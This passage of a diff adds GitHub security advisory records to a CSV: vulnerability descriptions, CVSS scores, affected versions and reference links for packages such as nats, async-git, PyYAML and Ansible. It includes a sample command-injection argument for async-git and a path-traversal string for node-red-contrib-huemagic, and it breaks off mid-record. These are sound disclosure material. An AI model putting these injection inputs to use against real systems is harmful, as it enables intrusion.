+For clarity: NATS account NKey authentication **is NOT affected**.
+
+Neither the nats.ws nor the nats.deno clients support Mutual TLS: the affected versions listed below are those where the logic flaw is
+present. We are including the nats.ws and nats.deno versions out of an abundance of caution, as library maintainers, but rate as minimal the likelihood of applications leaking sensitive data.
+
+
+## Affected versions
+
+### Security impact
+
+* NPM package nats.js:
+ + **mainline is unaffected**
+ + beta branch is vulnerable from 2.0.0-201, fixed in 2.0.0-209
+
+### Logic flaw
+
+* NPM package nats.ws:
+ + status: preview
+ + flawed from 1.0.0-85, fixed in 1.0.0-111
+
+* Deno repository https://github.com/nats-io/nats.deno
+ + status: preview
+ + flawed in all git tags prior to fix
+ + fixed with git tag v1.0.0-9
+
+
+## Impact
+
+For deployments using TLS client certificates (for mutual TLS), private key material for TLS is leaked from the client application to the
+server. If the server is untrusted (run by a third party), or if the client application also disables TLS verification (and so the true identity of the server is unverifiable) then authentication credentials are leaked.
+
+## Workaround
+
+*None*
+
+## Solution
+
+Upgrade your package dependencies to fixed versions, and then reissue any TLS client credentials (with new keys, not just new certificates) and revoke the old ones.",[],"[{'package': {'ecosystem': 'npm', 'name': 'nats'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0-201'}, {'fixed': '2.0.0-209'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.0-208'}}]","[{'type': 'WEB', 'url': 'https://github.com/nats-io/nats.js/security/advisories/GHSA-prmc-5v5w-c465'}, {'type': 'WEB', 'url': 'https://advisories.nats.io/CVE/CVE-2020-26149.txt'}]","{'cwe_ids': ['CWE-522'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T18:09:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6qpr-9mc5-7gch,2023-09-07T18:43:43Z,2021-04-12T19:50:20Z,,['CVE-2020-28490'],Command Injection in async-git,The package async-git before 1.13.2 are vulnerable to Command Injection via shell meta-characters (back-ticks). For example: `git.reset('atouch HACKEDb')`,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'async-git'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28490'}, {'type': 'WEB', 'url': 'https://github.com/omrilotan/async-git/pull/14'}, {'type': 'WEB', 'url': 'https://github.com/omrilotan/async-git/commit/d1950a5021f4e19d92f347614be0d85ce991510d'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ASYNCGIT-1064877'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/async-git'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:57:13Z', 'nvd_published_at': '2021-02-18T15:15:00Z'}"
+1.4.0,GHSA-88rc-3p98-rgvx,2021-04-12T22:33:13Z,2021-04-13T15:13:48Z,,[],After order payment process manipulation in shopware/platform and shopware/core ,"### Impact
+
+After order payment process manipulation
+
+### Patches
+We recommend to update to the current version 6.3.5.3. You can get the update to 6.3.5.3 regularly via the Auto-Updater or directly via the download overview.
+
+https://www.shopware.com/en/download/#shopware-6
+
+### Workarounds
+
+For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
+
+https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
+
+### For more information
+https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-04-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.2'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-88rc-3p98-rgvx'}]","{'cwe_ids': ['CWE-668'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T22:33:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-vf26-7gjf-f92r,2021-04-08T20:03:52Z,2021-04-13T15:23:29Z,,['CVE-2019-10796'],OS Command Injection in rpi,rpi through 0.0.3 allows execution of arbritary commands. The variable pinNumbver in function GPIO within src/lib/gpio.js is used as part of the arguement of exec function without any sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'rpi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10796'}, {'type': 'WEB', 'url': 'https://github.com/xseignard/rpi/blob/master/src/lib/gpio.js#L47'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-RPI-548942'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T20:03:52Z', 'nvd_published_at': '2020-02-24T18:15:00Z'}"
+1.4.0,GHSA-6757-jp84-gxfx,2022-07-29T18:40:16Z,2021-04-20T16:14:24Z,,['CVE-2020-1747'],Improper Input Validation in PyYAML,"A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pyyaml'}, 'ecosystem_specific': {'affected_functions': ['yaml.load', 'yaml.full_load', 'yaml.FullLoader']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1747'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/pull/386'}, {'type': 'WEB', 'url': 'https://github.com/yaml/pyyaml/commit/5080ba513377b6355a0502104846ee804656f1e0'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1747'}, {'type': 'PACKAGE', 'url': 'https://github.com/yaml/pyyaml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7PPAS6C4SZRDQLR7C22A5U3QOLXY33JX/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K5HEPD7LEVDPCITY5IMDYWXUMX37VFMY/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MMQXSZXNJT6ERABJZAAICI3DQSQLCP3D/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WORRFHPQVAFKKXXWLSSW6XKUYLWM6CSH/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBJA3SGNJKCAYPSHOHWY3KBCWNM5NYK2/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00017.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00017.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T22:29:00Z', 'nvd_published_at': '2020-03-24T15:15:00Z'}"
+1.4.0,GHSA-fvrf-9428-527m,2021-04-30T20:20:59Z,2021-04-22T16:11:01Z,,['CVE-2021-21427'],Backport for CVE-2021-21024 Blind SQLi from Magento 2,"### Impact
+This vulnerability allows an administrator unauthorized access to restricted resources.
+
+We fixed a vulnerability in the MySQL adapter to prevent SQL injection attacks. This is a backport of CVE-2021-21024 https://helpx.adobe.com/security/products/magento/apsb21-08.html.
+
+
+### Patches
+_Has the problem been patched? What versions should users upgrade to?_
+> v20.0.9 v19.4.13","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '19.4.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 19.4.12'}}, {'package': {'ecosystem': 'Packagist', 'name': 'openmage/magento-lts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '20.0.0'}, {'fixed': '20.0.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 20.0.8'}}]","[{'type': 'WEB', 'url': 'https://github.com/OpenMage/magento-lts/security/advisories/GHSA-fvrf-9428-527m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21427'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T21:06:43Z', 'nvd_published_at': '2021-04-21T21:15:00Z'}"
+1.4.0,GHSA-j2h6-73x8-22c4,2023-08-31T20:44:29Z,2021-04-20T16:43:53Z,,['CVE-2020-1746'],Exposure of Sensitive Information to an Unauthorized Actor in ansible,A flaw was found in the Ansible Engine affecting Ansible Engine versions 2.7.x before 2.7.17 and 2.8.x before 2.8.11 and 2.9.x before 2.9.7 as well as Ansible Tower before and including versions 3.4.5 and 3.5.5 and 3.6.3 when the ldap_attr and ldap_entry community modules are used. The issue discloses the LDAP bind password to stdout or a log file if a playbook task is written using the `bind_pw` in the parameters field. The highest threat from this vulnerability is data confidentiality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.17'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.11'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1746'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/67866'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/67866/commits/0ff609f1bc5e391fa25710b9a0baaf669f347eb1'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1746'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T22:47:04Z', 'nvd_published_at': '2020-05-12T18:15:00Z'}"
+1.4.0,GHSA-6q4w-3wp4-q5wf,2022-05-03T02:57:48Z,2021-04-13T15:15:57Z,,['CVE-2021-27191'],Denial of Service in get-ip-range,"The get-ip-range package before 4.0.0 for Node.js is vulnerable to denial of service (DoS) if the range is untrusted input. An attacker could send a large range (such as 128.0.0.0/1) that causes resource exhaustion. Update get-ip-range dependency to 4.0.0 or above.
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'get-ip-range'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27191'}, {'type': 'WEB', 'url': 'https://github.com/JoeScho/get-ip-range/commit/98ca22b815c77273cbab259811ab0976118e13b6'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4304'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210319-0002/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/get-ip-range'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T22:50:19Z', 'nvd_published_at': '2021-02-11T18:15:00Z'}"
+1.4.0,GHSA-gwp7-vqr5-h33h,2023-08-07T13:01:27Z,2021-04-20T16:13:45Z,,['CVE-2020-35678'],Open Redirect in autobahn,Autobahn|Python before 20.12.3 allows redirect header injection.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'autobahn'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.12.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35678'}, {'type': 'WEB', 'url': 'https://github.com/crossbario/autobahn-python/pull/1439'}, {'type': 'WEB', 'url': 'https://autobahn.readthedocs.io/en/latest/changelog.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossbario/autobahn-python'}, {'type': 'WEB', 'url': 'https://github.com/crossbario/autobahn-python/compare/v20.12.2...v20.12.3'}, {'type': 'WEB', 'url': 'https://pypi.org/project/autobahn/20.12.3/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T22:27:56Z', 'nvd_published_at': '2020-12-27T00:15:00Z'}"
+1.4.0,GHSA-rhh9-cm65-3w54,2021-10-05T16:27:33Z,2021-04-30T17:29:30Z,,['CVE-2018-11765'],Improper Authentication in Apache Hadoop,"In Apache Hadoop versions 3.0.0-alpha2 to 3.0.0, 2.9.0 to 2.9.2, 2.8.0 to 2.8.5, any users can access some servlets without authentication when Kerberos authentication is enabled and SPNEGO through HTTP is not enabled.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.hadoop:hadoop-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0-alpha2'}, {'fixed': '3.0.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.hadoop:hadoop-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.2'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.hadoop:hadoop-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.8.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-11765'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r17d94d132b207dad221595fd8b8b18628f5f5ec7e3f5be939ecd8928@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2c7f899911a04164ed1707083fcd4135f8427e04778c87d83509b0da%40%3Cgeneral.hadoop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r46447f38ea8c89421614e9efd7de5e656186d35e10fc97cf88477a01@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4dddf1705dbedfa94392913b2dad1cd2d1d89040facd389eea0b3510@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r74825601e93582167eb7cdc2f764c74c9c6d8006fa90018562fda60f@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r79b15c5b66c6df175d01d7560adf0cd5c369129b9a161905e0339927@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb21df54a4e39732ce653d2aa5672e36a792b59eb6717f2a06bb8d02a@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb241464d83baa3749b08cd3dabc8dba70a9a9027edcef3b5d4c24ef4@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbe25cac0f499374f8ae17a4a44a8404927b56de28d4c41940d82b7a4@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reea5eb8622afbfbfca46bc758f79db83d90a3263a906c4d1acba4971@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf9dfa8b77585c9227db9637552eebb2ab029255a0db4eb76c2b6c4cf@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20201016-0005/'}]","{'cwe_ids': ['CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T21:56:41Z', 'nvd_published_at': '2020-09-30T18:15:00Z'}"
+1.4.0,GHSA-rjmf-p882-645m,2021-04-12T18:51:10Z,2021-04-12T18:51:17Z,,['CVE-2021-20327'],Improper Certificate Validation,"A specific version of the Node.js mongodb-client-encryption module does not perform correct validation of the KMS server’s certificate. This vulnerability in combination with a privileged network position active MITM attack could result in interception of traffic between the Node.js driver and the KMS service rendering client-side field level encryption (CSFLE) ineffective. This issue was discovered during internal testing and affects mongodb-client-encryption module version 1.2.0, which was available from 2021-Jan-29 and deprecated in the NPM Registry on 2021-Feb-04. This vulnerability does not impact driver traffic payloads with CSFLE-supported key services from applications residing inside the AWS, GCP, and Azure nework fabrics due to compensating controls in these environments. This issue does not impact driver workloads that don’t use Field Level Encryption.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'mongodb-client-encryption'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.1'}]}], 'versions': ['1.2.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20327'}, {'type': 'WEB', 'url': 'https://github.com/mongodb/libmongocrypt/commit/76365515ff8754b9f705e56428dd0d7efa7f541b'}, {'type': 'WEB', 'url': 'https://jira.mongodb.org/browse/NODE-3125'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1660'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T00:00:28Z', 'nvd_published_at': '2021-02-25T17:15:00Z'}"
+1.4.0,GHSA-q348-f93x-9gx4,2021-04-28T22:29:16Z,2021-04-29T21:53:06Z,,['CVE-2021-30492'],Lack of Input Validation in zendesk_api_client_php for Zendesk Subdomain,"### Impact
+Lack of input validation of the Zendesk subdomain could expose users of the library to Server Side Request Forgery (SSRF).
+
+### Resolution
+Validate the provided Zendesk subdomain to be a valid subdomain in:
+* getAuthUrl
+* getAccessToken",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'zendesk/zendesk_api_client_php'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zendesk/zendesk_api_client_php/security/advisories/GHSA-q348-f93x-9gx4'}, {'type': 'WEB', 'url': 'https://github.com/zendesk/zendesk_api_client_php/pull/466'}, {'type': 'WEB', 'url': 'https://github.com/zendesk/zendesk_api_client_php/commit/b451b743d9d6d81a9abf7cb86e70ec9c5332123e'}]","{'cwe_ids': ['CWE-20', 'CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T22:29:16Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hxmg-hm46-cf62,2023-09-12T19:23:11Z,2021-04-13T15:41:01Z,,['CVE-2020-24391'],Remote code execution in mongo-express,mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mongodb-query-parser'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24391'}, {'type': 'WEB', 'url': 'https://github.com/mongodb-js/query-parser/issues/16'}, {'type': 'WEB', 'url': 'https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T20:14:37Z', 'nvd_published_at': '2021-03-30T21:15:00Z'}"
+1.4.0,GHSA-22cm-3qf2-2wc7,2021-04-01T23:39:38Z,2021-04-13T15:30:27Z,,['CVE-2021-23335'],LDAP Injection in is-user-valid,All versions of package is-user-valid are vulnerable to LDAP Injection which can lead to either authentication bypass or information exposure.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'is-user-valid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23335'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ISUSERVALID-1056766'}]","{'cwe_ids': ['CWE-74', 'CWE-90'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-01T23:39:38Z', 'nvd_published_at': '2021-02-11T12:15:00Z'}"
+1.4.0,GHSA-hxp5-8pgq-mgv9,2021-04-21T20:27:19Z,2021-04-22T16:14:14Z,,['CVE-2020-13955'],Missing Authentication for Critical Function in Apache Calcite,"""HttpUtils#getURLConnection method disables explicitly hostname verification for HTTPS connections making clients vulnerable to man-in-the-middle attacks. Calcite uses this method internally to connect with Druid and Splunk so information leakage may happen when using the respective Calcite adapters. The method itself is in a utility class so people may use it to create vulnerable HTTPS connections for other applications. From Apache Calcite 1.26 onwards, the hostname verification will be performed using the default JVM truststore.""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.calcite:calcite-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.26.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.calcite:calcite-druid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.26.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.calcite:calcite-splunk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.26.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13955'}, {'type': 'WEB', 'url': 'https://github.com/apache/calcite/commit/43eeafcbac29d02c72bd520c003cdfc571de2d15'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/CALCITE-4298'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b0fbe2038388175951ce1028182d980f9e9a7328be13d52dab70bb3%40%3Cdev.calcite.apache.org%3E'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T20:27:19Z', 'nvd_published_at': '2020-10-09T13:15:00Z'}"
+1.4.0,GHSA-2c8c-84w2-j38j,2021-04-07T19:33:49Z,2021-04-07T21:14:00Z,,['CVE-2020-28736'],Improper Restriction of XML External Entity Reference in Plone,"Plone before 5.2.3 allows XXE attacks via a feature that is protected by an unapplied permission of plone.schemaeditor.ManageSchemata (therefore, only available to the Manager role).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.event'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.theming'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.dexterity'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.8'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.supermodel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28736'}, {'type': 'WEB', 'url': 'https://github.com/plone/Products.CMFPlone/issues/3209'}, {'type': 'WEB', 'url': 'https://dist.plone.org/release/5.2.3/RELEASE-NOTES.txt'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T19:33:49Z', 'nvd_published_at': '2020-12-30T19:15:00Z'}"
+1.4.0,GHSA-frpw-jrwx-hcfv,2023-09-07T22:38:20Z,2021-04-13T15:30:00Z,,['CVE-2021-25864'],Path Traversal in node-red-contrib-huemagic,"node-red-contrib-huemagic 3.0.0 is affected by `hue/assets/..%2F` Directory Traversal.in the `res.sendFile` API, used in file hue-magic.js, to fetch an arbitrary file.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-red-contrib-huemagic'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25864'}, {'type': 'WEB', 'url': 'https://github.com/Foddy/node-red-contrib-huemagic/issues/217'}, {'type': 'PACKAGE', 'url': 'https://github.com/Foddy/node-red-contrib-huemagic'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T23:24:50Z', 'nvd_published_at': '2021-01-26T18:16:00Z'}"
+1.4.0,GHSA-9mrv-456v-pf22,2021-03-22T23:06:41Z,2021-04-13T15:19:50Z,,['CVE-2020-28487'],Cross-site Scripting in vis-timeline,"This affects the package vis-timeline before 7.4.4.
